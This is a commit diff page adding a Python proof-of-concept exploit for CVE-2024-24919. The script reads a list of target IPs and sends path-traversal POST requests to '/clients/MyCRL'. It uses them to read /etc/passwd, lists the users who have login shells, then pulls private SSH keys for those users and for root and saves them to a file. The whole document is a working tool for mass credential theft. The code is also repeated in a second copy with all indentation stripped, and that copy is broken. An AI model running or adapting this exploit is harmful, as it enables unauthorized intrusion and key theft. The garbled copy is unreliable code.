JoyGhoshs · June 1, 2024 13:11
diff --git a/CVE-2024-24919.py b/CVE-2024-24919.py
 import requests
 from argparse import ArgumentParser
 from urllib3.exceptions import InsecureRequestWarning
 from colorama import Fore, Style
 from concurrent.futures import ThreadPoolExecutor
 requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

 def exploit(ip, path):
    host = f'https://{ip}/clients/MyCRL'
    data = f'aCSHELL/../../../../../../../../../../..{path}'
    headers = {
        'Host': ip,
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0',
        'Te': 'trailers',
        'Dnt': '1',
        'Connection': 'keep-alive',
        'Content-Length': '48'
    }
    try:
        response = requests.post(host, headers=headers, data=data, verify=False, timeout=5)
        if response.status_code == 200:
            return response.text
        else:
            return False
    except Exception as e:
        return False

 def usernames(passwd_content):
    usernames = []
    lines = passwd_content.split('\n')
    for line in lines:
        parts = line.split(':')
        if len(parts) >= 7:
            username = parts[0]
            shell = parts[-1].strip()
            if shell not in ['/sbin/nologin', '/bin/false', '/usr/sbin/nologin', '/bin/sync']:
                usernames.append(username)
    return usernames
    
 def elevate(ip):
    passwd = exploit(ip, "/etc/passwd")
    if passwd:
        print(f'{Fore.GREEN}[+] {Fore.WHITE}Loaded {Fore.GREEN}{ip}{Fore.WHITE} as a target')
        print(f'{Fore.GREEN}[+] {Fore.WHITE}Extracted passwd file from {Fore.GREEN}{ip}')
        username = usernames(passwd)
        print(f'{Fore.GREEN}[+] {Fore.WHITE}Extracted usernames: {Fore.RED}{", ".join(username)}{Fore.RESET}')
        print(f'{Fore.GREEN}[+] {Fore.WHITE}Attempting to extract SSH keys from {Fore.GREEN}{ip}')
        print(f'{Fore.GREEN}[+] {Fore.WHITE}Generated SSH key paths')
        sshkeypathlists = []
        for user in username:
            sshkeypathlists.append(f'/home/{user}/.ssh/id_rsa')
            sshkeypathlists.append(f'/home/{user}/.ssh/id_dsa')
            sshkeypathlists.append(f'/home/{user}/.ssh/id_ecdsa')
            sshkeypathlists.append(f'/home/{user}/.ssh/id_ed25519')
            sshkeypathlists.append(f'/home/{user}/.ssh/config')
            sshkeypathlists.append(f'/home/{user}/.ssh/identity')
            sshkeypathlists.append(f'/home/{user}/.ssh/id_rsa.pub')
            sshkeypathlists.append(f'/home/{user}/.ssh/id_dsa.pub')
            sshkeypathlists.append(f'/home/{user}/.ssh/id_ecdsa.pub')
            sshkeypathlists.append(f'/home/{user}/.ssh/id_ed25519.pub')
            sshkeypathlists.append(f'/home/{user}/.ssh/authorized_keys.pub')
            sshkeypathlists.append(f'/home/{user}/.ssh/known_hosts.pub')
            sshkeypathlists.append(f'/home/{user}/.ssh/config.pub')
            sshkeypathlists.append(f'/home/{user}/.ssh/identity.pub')
            sshkeypathlists.append(f'/root/.ssh/id_rsa')
            sshkeypathlists.append(f'/root/.ssh/id_dsa')
            sshkeypathlists.append(f'/root/.ssh/id_ecdsa')
            sshkeypathlists.append(f'/root/.ssh/id_ed25519')
            sshkeypathlists.append(f'/home/{user}/.ssh/known_hosts')
        for sshkeypath in sshkeypathlists:
            sshkey = exploit(ip, sshkeypath)
            if sshkey:
                print(f'{Fore.GREEN}[+] {Fore.WHITE}Extracted SSH key from {Fore.GREEN}{ip}{Fore.WHITE} successfully')
                print(f'{Fore.GREEN}[+] {Fore.WHITE}SSH Key: {sshkey}')
                data = f"[+] Extracted SSH key from {ip} successfully\n[+] SSH Key: {sshkey}\n"
                with open('sshkeys.txt', 'a') as file:
                    file.write(data)
            else:
                print(f'{Fore.RED}[-] {Fore.WHITE}Failed to extract SSH key from {Fore.RED}{ip}{Fore.WHITE} passed {Fore.RED}{sshkeypath}{Fore.WHITE}')
                


 if __name__ == '__main__':
    parser = ArgumentParser(description='CVE-2024-24919 PoC')
    parser.add_argument('-l', '--list', required=True)
    args = parser.parse_args()

    with open(args.list, 'r') as file:
        ips = [ip.strip().replace('https://', '') for ip in file if ip.strip()]

    for ip in ips:
        elevate(ip)
	import requests
	from argparse import ArgumentParser
	from urllib3.exceptions import InsecureRequestWarning
	from colorama import Fore, Style
	from concurrent.futures import ThreadPoolExecutor
	requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

	def exploit(ip, path):
	host = f'https://{ip}/clients/MyCRL'
	data = f'aCSHELL/../../../../../../../../../../..{path}'
	headers = {
	'Host': ip,
	'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0',
	'Te': 'trailers',
	'Dnt': '1',
	'Connection': 'keep-alive',
	'Content-Length': '48'
	}
	try:
	response = requests.post(host, headers=headers, data=data, verify=False, timeout=5)
	if response.status_code == 200:
	return response.text
	else:
	return False
	except Exception as e:
	return False

	def usernames(passwd_content):
	usernames = []
	lines = passwd_content.split('\n')
	for line in lines:
	parts = line.split(':')
	if len(parts) >= 7:
	username = parts[0]
	shell = parts[-1].strip()
	if shell not in ['/sbin/nologin', '/bin/false', '/usr/sbin/nologin', '/bin/sync']:
	usernames.append(username)
	return usernames

	def elevate(ip):
	passwd = exploit(ip, "/etc/passwd")
	if passwd:
	print(f'{Fore.GREEN}[+] {Fore.WHITE}Loaded {Fore.GREEN}{ip}{Fore.WHITE} as a target')
	print(f'{Fore.GREEN}[+] {Fore.WHITE}Extracted passwd file from {Fore.GREEN}{ip}')
	username = usernames(passwd)
	print(f'{Fore.GREEN}[+] {Fore.WHITE}Extracted usernames: {Fore.RED}{", ".join(username)}{Fore.RESET}')
	print(f'{Fore.GREEN}[+] {Fore.WHITE}Attempting to extract SSH keys from {Fore.GREEN}{ip}')
	print(f'{Fore.GREEN}[+] {Fore.WHITE}Generated SSH key paths')
	sshkeypathlists = []
	for user in username:
	sshkeypathlists.append(f'/home/{user}/.ssh/id_rsa')
	sshkeypathlists.append(f'/home/{user}/.ssh/id_dsa')
	sshkeypathlists.append(f'/home/{user}/.ssh/id_ecdsa')
	sshkeypathlists.append(f'/home/{user}/.ssh/id_ed25519')
	sshkeypathlists.append(f'/home/{user}/.ssh/config')
	sshkeypathlists.append(f'/home/{user}/.ssh/identity')
	sshkeypathlists.append(f'/home/{user}/.ssh/id_rsa.pub')
	sshkeypathlists.append(f'/home/{user}/.ssh/id_dsa.pub')
	sshkeypathlists.append(f'/home/{user}/.ssh/id_ecdsa.pub')
	sshkeypathlists.append(f'/home/{user}/.ssh/id_ed25519.pub')
	sshkeypathlists.append(f'/home/{user}/.ssh/authorized_keys.pub')
	sshkeypathlists.append(f'/home/{user}/.ssh/known_hosts.pub')
	sshkeypathlists.append(f'/home/{user}/.ssh/config.pub')
	sshkeypathlists.append(f'/home/{user}/.ssh/identity.pub')
	sshkeypathlists.append(f'/root/.ssh/id_rsa')
	sshkeypathlists.append(f'/root/.ssh/id_dsa')
	sshkeypathlists.append(f'/root/.ssh/id_ecdsa')
	sshkeypathlists.append(f'/root/.ssh/id_ed25519')
	sshkeypathlists.append(f'/home/{user}/.ssh/known_hosts')
	for sshkeypath in sshkeypathlists:
	sshkey = exploit(ip, sshkeypath)
	if sshkey:
	print(f'{Fore.GREEN}[+] {Fore.WHITE}Extracted SSH key from {Fore.GREEN}{ip}{Fore.WHITE} successfully')
	print(f'{Fore.GREEN}[+] {Fore.WHITE}SSH Key: {sshkey}')
	data = f"[+] Extracted SSH key from {ip} successfully\n[+] SSH Key: {sshkey}\n"
	with open('sshkeys.txt', 'a') as file:
	file.write(data)
	else:
	print(f'{Fore.RED}[-] {Fore.WHITE}Failed to extract SSH key from {Fore.RED}{ip}{Fore.WHITE} passed {Fore.RED}{sshkeypath}{Fore.WHITE}')



	if __name__ == '__main__':
	parser = ArgumentParser(description='CVE-2024-24919 PoC')
	parser.add_argument('-l', '--list', required=True)
	args = parser.parse_args()

	with open(args.list, 'r') as file:
	ips = [ip.strip().replace('https://', '') for ip in file if ip.strip()]

	for ip in ips:
	elevate(ip)